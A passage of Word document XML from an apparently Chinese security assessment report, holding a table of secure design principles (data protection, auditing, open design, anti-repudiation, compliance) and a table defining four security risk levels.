          <w:p w14:paraId="3C6B1C23">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>尽可能的重用软件已有的模块，这样可以降低引入新的漏洞和攻击界面的可能性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0EE20DF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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ACBB947">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据保护原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EEC136">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Data </w:t>
            </w:r>
            <w:r>
              <w:t>Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C541544">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>对用户数据的保护功能应涵盖用户数据存储的完整性、用户数据传输保密性、数据传输的访问控制、剩余信息的保护、数据反转操作等内容；应对系统中关键数据（如用户密码等）的存储和网络传输时应采用加密保护，实用加密加密算法应该符合国际标准、国家标准和业界标准。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6338CA5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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44682825">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可审计原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B368EEB">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D942965">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>在应用系统中设计审计日志记录的功能，并对应用系统产生的日志增加完备的审计功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37EF4B1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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C4675E">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开放设计原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52EE4038">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Open Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1105B08C">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>开放设计与“不开放即安全”的原则相对而言，认为设计本身不应具有神秘感。这一原则的具体表现可以参见应用于加密设计的Kerchoff定律，“系统不应单纯依赖私密性，若落入敌人手中则毫无优势可言”；开放设计以提高系统兼容性和可扩展性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="587BF7E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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66FCD7A2">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>抗抵赖原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18235C78">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Anti </w:t>
            </w:r>
            <w:r>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C92F063">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>对于涉及支付交易等重要的业务场景，系统设计应有效地防止通信双方抵赖，如采用电子证书签名等方式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C9043E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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DF7F8EE">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>规范性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0604F8FD">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:t>Standardization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="486B298A">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>系统设计所采用的安全技术和安全产品应符合国际标准、国家标准和业界标准，为系统的扩展升级、与其他系统的互联提供良好的基础。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="194E900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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4498FA89">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>可扩展性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651C329D">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05509E74">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>以当前业务安全需求为基础，充分考虑发展的需要，安全功能模块子系统以插件或接口方式以方便未来的扩展。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="41A3BC0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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EDD1FE6">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>实用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311D0589">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Practicable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62EF14CB">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>安全功能设计需要尽可能的考虑投入产出比，同时尽量控制对用户体验的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B05979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3059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76269169">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>符合性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CC7513">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Regulatory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42D4D084">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>安全功能的设计尽可能的要符合国家规范、行业规范以及业界的通用标准，如等级保护等规范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BD5A880">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609E329B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="060D0CA5">
      <w:pPr>
        <w:pStyle w:val="98"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc15464582"/>
      <w:bookmarkStart w:id="129" w:name="_Toc11859792"/>
      <w:bookmarkStart w:id="130" w:name="_Toc15461969"/>
      <w:bookmarkStart w:id="131" w:name="_Toc28117"/>
      <w:bookmarkStart w:id="132" w:name="_Toc394569414"/>
      <w:bookmarkStart w:id="133" w:name="_Toc411010723"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>安全风险状况等级说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="861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28"/>
        <w:gridCol w:w="6785"/>
      </w:tblGrid>
      <w:tr w14:paraId="61A8F9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2" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8613" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1A55E0F9">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全风险状况说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="58A54A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93" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4439CD69">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>良好状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6785" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63564BFA">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息系统处于良好运行状态，没有发现或只存在零星的低风险安全问题，此时只要保持现有安全策略就满足了本系统的安全等级要求。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68EAA0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23" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70731759">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="FFC000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FFC000"/>
              </w:rPr>
              <w:t>预警状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6785" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AC39D9F">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息系统中存在一些漏洞或安全隐患，此时需根据评估中发现的网络、主机、应用和管理等方面的问题对进行有针对性的加固或改进。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="425BE7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408" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="540C5149">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>严重状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6785" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="431D5B44">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息系统中发现存在严重漏洞或可能严重威胁到系统正常运行的安全问题，此时需要立刻采取措施，例如安装补丁或重新部署安全系统进行防护等等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="45BAD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58" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6192B04A">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>紧急状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6785" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DBBB198">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息系统面临严峻的网络安全态势，对组织的重大经济利益或政治利益可能造成严重损害。此时需要与其他安全部门通力协作采取紧急防御措施。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43F26174">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A4B5B8">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A17F1F">
      <w:pPr>
        <w:pStyle w:val="98"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc20344"/>
      <w:bookmarkStart w:id="135" w:name="_Toc11859793"/>
      <w:bookmarkStart w:id="136" w:name="_Toc15461970"/>
      <w:bookmarkStart w:id="137" w:name="_Toc15464583"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>漏洞等级状况说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
